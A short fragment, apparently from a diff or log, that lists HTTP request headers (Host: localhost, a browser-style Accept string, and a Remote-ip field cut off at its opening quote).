+ Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Remote-ip: "